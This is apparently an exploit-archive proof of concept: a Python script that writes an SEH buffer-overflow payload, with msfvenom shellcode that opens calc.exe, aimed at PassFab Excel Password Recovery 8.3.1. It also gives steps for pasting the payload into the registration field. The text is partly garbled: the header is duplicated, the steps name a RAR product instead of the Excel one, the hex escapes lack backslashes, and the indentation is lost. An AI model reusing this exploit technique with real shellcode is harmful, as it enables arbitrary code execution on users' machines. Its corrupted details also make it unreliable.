# Exploit Title: PassFab Excel Password Recovery SEH Local Exploit
# Date: 31.01.19
# Vendor Homepage:https://www.passfab.com/products/excel-password-recovery.html
# Software Link: htt # Exploit Title: PassFab Excel Password Recovery SEH Local Exploit
# Date: 31.01.19
# Vendor Homepage:https://www.passfab.com/products/excel-password-recovery.html
# Software Link: https://www.passfab.com/downloads/passfab-excel-password-recovery.exe
# Exploit Author: Achilles
# Tested Version: 8.3.1
# Tested on: Windows XP SP3


# 1.- Run python code : PassFab_RAR
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open PassFab RAR Password Recovery
# 4.- In the new Window click on the key in the upper right corner
# 5.- Paste the content of EVIL.txt into the Field: 'Licensed E-mail and Registration Code'
# 6.- Click 'Register'and the calculator will open
# 7.- Greetings go:XiDreamzzXi,Metatron

#!/usr/bin/env python
import struct

buffer = "x41" * 260
NSEH = "xebx06x90x90" #jmp short 6
SEH = struct.pack('<L',0x100674dd) #pop pop ret SoftwareLog.dll
nops = "x90" * 20

#badchar x00
#msfvenom -p windows/exec CMD=calc.exe -b "x00" -f python
buf = ""
buf += "xbfxc6xdex94x3exdaxd0xd9x74x24xf4x5d"
buf += "x31xc9xb1x31x31x7dx13x03x7dx13x83xc5"
buf += "xc2x3cx61xc2x22x42x8ax3bxb2x23x02xde"
buf += "x83x63x70xaaxb3x53xf2xfex3fx1fx56xeb"
buf += "xb4x6dx7fx1cx7dxdbx59x13x7ex70x99x32"
buf += "xfcx8bxcex94x3dx44x03xd4x7axb9xeex84"
buf += "xd3xb5x5dx39x50x83x5dxb2x2ax05xe6x27"
buf += "xfax24xc7xf9x71x7fxc7xf8x56x0bx4exe3"
buf += "xbbx36x18x98x0fxccx9bx48x5ex2dx37xb5"
buf += "x6fxdcx49xf1x57x3fx3cx0bxa4xc2x47xc8"
buf += "xd7x18xcdxcbx7fxeax75x30x7ex3fxe3xb3"
buf += "x8cxf4x67x9bx90x0bxabx97xacx80x4ax78"
buf += "x25xd2x68x5cx6ex80x11xc5xcax67x2dx15"
buf += "xb5xd8x8bx5dx5bx0cxa6x3fx31xd3x34x3a"
buf += "x77xd3x46x45x27xbcx77xcexa8xbbx87x05"
buf += "x8dx34xc2x04xa7xdcx8bxdcxfax80x2bx0b"
buf += "x38xbdxafxbexc0x3axafxcaxc5x07x77x26"
buf += "xb7x18x12x48x64x18x37x2bxebx8axdbx82"
buf += "x8ex2ax79xdb"

payload = buffer + NSEH + SEH + nops + buf


try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"